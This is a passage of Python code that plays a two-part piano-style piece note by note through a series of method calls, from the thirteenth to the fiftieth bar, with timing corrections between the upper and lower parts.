self.sc.e5(1)
self.sc.a5(2)
# -------- thirteenth bar -------- #
# ---- major ---- #
self.sc.a5(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(8, 1)
self.sc.c6(2.5)
self.sc.modify_time(1.5)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(8, 1)
self.sc.e6(2.5)
self.sc.modify_time(1.5)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(2)
self.sc.modify_time(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(2)
# -------- fourteenth bar -------- #
# ---- major ---- #
self.sc.b5(1)
self.sc.b5(1)
self.sc.modify_time(2, 1)
self.sc.d6(1)
self.sc.g6s(1)
self.sc.a6(1)
self.sc.b6(1)
self.sc.e6(0.5)
self.sc.c7(0.5)
self.sc.d6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e4(1)
self.sc.b4(1)
self.sc.e5(2)
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(2)
# -------- fifteenth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(2)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(2)
# -------- sixteenth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6s(2)
self.sc.modify_time(2)
# -------- seventeenth bar -------- #
# ---- major ---- #
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.e6(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.d7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.b5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.g6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(1)
self.sc.e5(1)
self.sc.e4(1)
self.sc.b4(1)
self.sc.e5(2)
self.sc.modify_time(2, 1)
self.sc.g5(2)
# -------- eighteenth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.f6(0.5)
self.sc.c6(0.5)
self.sc.e6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(1)
self.sc.c5(1)
self.sc.c4(1)
self.sc.g4(1)
self.sc.c5(2)
self.sc.modify_time(2, 1)
self.sc.e5(2)
# -------- nineteenth bar -------- #
# ---- major ---- #
self.sc.f6(0.5)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.a5(0.5)
self.sc.d6(0.5)
self.sc.a5(0.5)
self.sc.f6(0.5)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.e6(0.5)
self.sc.e5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(1)
self.sc.modify_time(1, 1)
self.sc.d4(1)
self.sc.a4(1)
self.sc.f5(0.5)
self.sc.e5(0.5)
self.sc.d5(0.5)
self.sc.c5(0.5)
self.sc.a2(1)
self.sc.modify_time(1, 1)
self.sc.a3(1)
self.sc.e3(1)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.c4(0.5)
self.sc.b3(0.5)
# -------- twentieth bar -------- #
# ---- major ---- #
self.sc.d6(0.5)
self.sc.f5(0.5)
self.sc.c6(0.5)
self.sc.f5(0.5)
self.sc.b5(0.5)
self.sc.f5(0.5)
self.sc.a5(0.5)
self.sc.f5(0.5)
self.sc.f5(1)
self.sc.f5(1)
self.sc.e5(2)
self.sc.modify_time(4, 1)
self.sc.g5s(1)
self.sc.a5(1)
self.sc.b5(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.b2(1)
self.sc.modify_time(1, 1)
self.sc.b3(1)
self.sc.f4(1)
self.sc.b4(1)
self.sc.modify_time(1, 1)
self.sc.d5(1)
self.sc.f4(1)
self.sc.d4(1)
self.sc.c4(1)
self.sc.b3(1)
self.sc.e3(1)
self.sc.modify_time(4, 1)
self.sc.d5(1)
self.sc.c5(1)
self.sc.b4(1)
self.sc.e4(1)
# -------- twenty-first bar -------- #
# ---- major ---- #
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.e3(1)
self.sc.b3(1)
self.sc.g4(1)
self.sc.b3(1)
# -------- twenty-second bar -------- #
# ---- major ---- #
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.g4(0.5)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.c3(1)
self.sc.g3(1)
self.sc.e4(1)
self.sc.g3(1)
# -------- twenty-third bar -------- #
# ---- major ---- #
self.sc.f5(1)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(1)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(0.5)
self.sc.a3(0.5)
self.sc.d4(0.5)
self.sc.e4(0.5)
self.sc.f4(0.5)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.a3(0.5)
self.sc.a2(0.5)
self.sc.e3(0.5)
self.sc.a3(0.5)
self.sc.b3(0.5)
self.sc.c4(0.5)
self.sc.d4(0.5)
self.sc.e4(1)
# -------- twenty-fourth bar -------- #
# ---- major ---- #
self.sc.a5(1)
self.sc.e6(1)
self.sc.g5s(1)
self.sc.e6(1)
self.sc.a5(4)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(2)
self.sc.b2(1.5)
self.sc.a2(0.5)
self.sc.a2(1)
self.sc.modify_time(5, 1)
self.sc.d4(2)
self.sc.b3(1.5)
self.sc.a3(0.5)
self.sc.a3(1)
self.sc.e4(1)
self.sc.a4(2)
# -------- twenty-fifth bar -------- #
# ---- major ---- #
self.sc.a5(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(8, 1)
self.sc.c6(2.5)
self.sc.modify_time(1.5)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(8, 1)
self.sc.e6(2.5)
self.sc.modify_time(1.5)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.modify_time(1, 1)
self.sc.f4(1)
self.sc.f4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.f5(1)
self.sc.f4(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.modify_time(1, 1)
self.sc.g5(1)
self.sc.g4(1)
# -------- twenty-sixth bar -------- #
# ---- major ---- #
self.sc.b5(1.5)
self.sc.modify_time(1.5, 1)
self.sc.d6(1.5)
self.sc.b6(0.5)
self.sc.a6(1.5)
self.sc.g6s(0.5)
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.e7(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e3(1)
self.sc.modify_time(1, 1)
self.sc.e4(1)
self.sc.e4(1)
self.sc.g4s(1)
self.sc.modify_time(1, 1)
self.sc.b4(1)
self.sc.e4(1)
self.sc.a3(1)
self.sc.modify_time(1, 1)
self.sc.a4(1)
self.sc.e4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.e5(1)
self.sc.e4(1)
# -------- twenty-seventh bar -------- #
# ---- major ---- #
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.a6(2)
self.sc.modify_time(2, 1)
self.sc.e7(2)
self.sc.d7(1)
self.sc.d7(0.333)
self.sc.e7(0.333)
self.sc.d7(0.333)
self.sc.b6(1)
self.sc.g6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.modify_time(1, 1)
self.sc.f4(1)
self.sc.f4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.f5(1)
self.sc.f4(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.modify_time(1, 1)
self.sc.g5(1)
self.sc.g4(1)
# -------- twenty-eighth bar -------- #
# ---- major ---- #
self.sc.a6(6)
self.sc.modify_time(1)
self.sc.e6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(1)
self.sc.modify_time(1, 1)
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.a5(1)
self.sc.modify_time(1, 1)
self.sc.c6(1)
self.sc.e5(1)
self.sc.a5(2)
# -------- twenty-ninth bar -------- #
# ---- major ---- #
self.sc.a5(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(8, 1)
self.sc.c6(2.5)
self.sc.modify_time(1.5)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(8, 1)
self.sc.e6(2.5)
self.sc.modify_time(1.5)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.modify_time(1, 1)
self.sc.f4(1)
self.sc.f4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.f5(1)
self.sc.f4(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.modify_time(1, 1)
self.sc.g5(1)
self.sc.g4(1)
# -------- thirtieth bar -------- #
# ---- major ---- #
self.sc.b5(1)
self.sc.b5(1)
self.sc.modify_time(2, 1)
self.sc.d6(1)
self.sc.g6s(1)
self.sc.a6(1)
self.sc.b6(1)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e3(1)
self.sc.modify_time(1, 1)
self.sc.e4(1)
self.sc.e4(1)
self.sc.g4s(1)
self.sc.modify_time(1, 1)
self.sc.b4(1)
self.sc.e4(1)
self.sc.a3(1)
self.sc.modify_time(1, 1)
self.sc.a4(1)
self.sc.e4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.e5(1)
self.sc.e4(1)
# -------- thirty-first bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.c4(1)
self.sc.f4(2)
self.sc.modify_time(2, 1)
self.sc.a4(2)
self.sc.g3(1)
self.sc.d4(1)
self.sc.g4(2)
self.sc.modify_time(2, 1)
self.sc.b4(2)
# -------- thirty-second bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(1)
self.sc.e4(1)
self.sc.a4(1)
self.sc.b4(1)
self.sc.c5s(3)
self.sc.a4(1)
# -------- thirty-third bar -------- #
# ---- major ---- #
self.sc.a5(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(8, 1)
self.sc.c6(2.5)
self.sc.modify_time(1.5)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(8, 1)
self.sc.e6(2.5)
self.sc.modify_time(1.5)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.modify_time(1, 1)
self.sc.f4(1)
self.sc.f4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.f5(1)
self.sc.f4(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.b4(0.5)
self.sc.d5(0.5)
self.sc.g5(1)
self.sc.d5(1)
# -------- thirty-fourth bar -------- #
# ---- major ---- #
self.sc.b5(1.5)
self.sc.modify_time(1.5, 1)
self.sc.d6(1.5)
self.sc.b6(0.5)
self.sc.a6(1.5)
self.sc.g6s(0.5)
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.e7(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e3(1)
self.sc.modify_time(1, 1)
self.sc.e4(1)
self.sc.e4(1)
self.sc.g4s(1)
self.sc.modify_time(1, 1)
self.sc.b4(1)
self.sc.e4(1)
self.sc.a3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(1)
self.sc.a5(1)
# -------- thirty-fifth bar -------- #
# ---- major ---- #
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.a6(2)
self.sc.modify_time(2, 1)
self.sc.e7(2)
self.sc.d7(1)
self.sc.d7(0.333)
self.sc.e7(0.333)
self.sc.d7(0.333)
self.sc.b6(1)
self.sc.g6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.c5(1)
self.sc.f5(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.modify_time(1, 1)
self.sc.g5(1)
self.sc.g4(1)
# -------- thirty-sixth bar -------- #
# ---- major ---- #
self.sc.a6(6)
self.sc.modify_time(1)
self.sc.e6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.b5(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.c5(1)
self.sc.a4(1)
# -------- thirty-seventh bar -------- #
# ---- major ---- #
self.sc.a5(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(8, 1)
self.sc.c6(2.5)
self.sc.modify_time(1.5)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(8, 1)
self.sc.e6(2.5)
self.sc.modify_time(1.5)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.modify_time(1, 1)
self.sc.f4(1)
self.sc.f4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.f5(1)
self.sc.f4(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.b4(0.5)
self.sc.d5(0.5)
self.sc.g5(1)
self.sc.d5(1)
# -------- thirty-eighth bar -------- #
# ---- major ---- #
self.sc.b5(1.5)
self.sc.modify_time(1.5, 1)
self.sc.d6(1.5)
self.sc.b6(0.5)
self.sc.a6(1.5)
self.sc.g6s(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e3(1)
self.sc.modify_time(1, 1)
self.sc.e4(1)
self.sc.e4(1)
self.sc.g4s(1)
self.sc.modify_time(1, 1)
self.sc.b4(1)
self.sc.e4(1)
self.sc.a3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(1)
self.sc.e5(1)
# -------- thirty-ninth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(1)
self.sc.c4(1)
self.sc.g3(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.b4(1)
self.sc.d4(1)
# -------- fortieth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(1)
self.sc.e6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5s(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.b5(0.5)
self.sc.c6(2)
self.sc.e4(2)
self.sc.modify_time(2, 1)
self.sc.e5(2)
# -------- forty-first bar -------- #
# ---- major ---- #
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.e6(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.d7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.b5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.g6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.d5(0.5)
self.sc.e5(1)
self.sc.e3(1)
self.sc.modify_time(1, 1)
self.sc.e4(1)
self.sc.b4(1)
self.sc.e5(1)
self.sc.modify_time(1, 1)
self.sc.g5(1)
self.sc.b4(1)
# -------- forty-second bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.f6(0.5)
self.sc.c6(0.5)
self.sc.e6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(1)
self.sc.c3(1)
self.sc.modify_time(1, 1)
self.sc.c4(1)
self.sc.g4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.e5(1)
self.sc.g4(1)
# -------- forty-third bar -------- #
# ---- major ---- #
self.sc.f6(0.5)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.a5(0.5)
self.sc.d6(0.5)
self.sc.a5(0.5)
self.sc.f6(0.5)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.e6(0.5)
self.sc.e5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(1)
self.sc.modify_time(1, 1)
self.sc.d4(1)
self.sc.a4(1)
self.sc.f5(0.5)
self.sc.e5(0.5)
self.sc.d5(0.5)
self.sc.c5(0.5)
self.sc.a2(1)
self.sc.modify_time(1, 1)
self.sc.a3(1)
self.sc.e3(1)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.c4(0.5)
self.sc.b3(0.5)
# -------- forty-fourth bar -------- #
# ---- major ---- #
self.sc.d6(0.5)
self.sc.f5(0.5)
self.sc.c6(0.5)
self.sc.f5(0.5)
self.sc.b5(0.5)
self.sc.f5(0.5)
self.sc.a5(0.5)
self.sc.f5(0.5)
self.sc.f5(1)
self.sc.f5(1)
self.sc.e5(2)
self.sc.modify_time(4, 1)
self.sc.g5s(1)
self.sc.a5(1)
self.sc.b5(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.b2(1)
self.sc.modify_time(1, 1)
self.sc.b3(1)
self.sc.f4(1)
self.sc.b4(1)
self.sc.modify_time(1, 1)
self.sc.d5(1)
self.sc.f4(1)
self.sc.d4(1)
self.sc.c4(1)
self.sc.b3(1)
self.sc.e3(1)
self.sc.modify_time(4, 1)
self.sc.d5(1)
self.sc.c5(1)
self.sc.b4(1)
self.sc.e4(1)
# -------- forty-fifth bar -------- #
# ---- major ---- #
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.e3(1)
self.sc.b3(1)
self.sc.g4(1)
self.sc.b3(1)
# -------- forty-sixth bar -------- #
# ---- major ---- #
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.g4(0.5)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.c3(1)
self.sc.g3(1)
self.sc.e4(1)
self.sc.g3(1)
# -------- forty-seventh bar -------- #
# ---- major ---- #
self.sc.f5(1)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(1)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(0.5)
self.sc.a3(0.5)
self.sc.d4(0.5)
self.sc.e4(0.5)
self.sc.f4(0.5)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.a3(0.5)
self.sc.a2(0.5)
self.sc.e3(0.5)
self.sc.a3(0.5)
self.sc.b3(0.5)
self.sc.c4(0.5)
self.sc.d4(0.5)
self.sc.e4(1)
# -------- forty-eighth bar -------- #
# ---- major ---- #
self.sc.a5(1)
self.sc.e6(1)
self.sc.g5s(1)
self.sc.e6(1)
self.sc.a5(4)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(2)
self.sc.b2(1.5)
self.sc.a2(0.5)
self.sc.a2(1)
self.sc.modify_time(5, 1)
self.sc.d4(2)
self.sc.b3(1.5)
self.sc.a3(0.5)
self.sc.a3(1)
self.sc.e4(1)
self.sc.a4(2)
# -------- forty-ninth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f5(2)
self.sc.f5(2)
self.sc.g5(2)
self.sc.e5(2)
# -------- fiftieth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
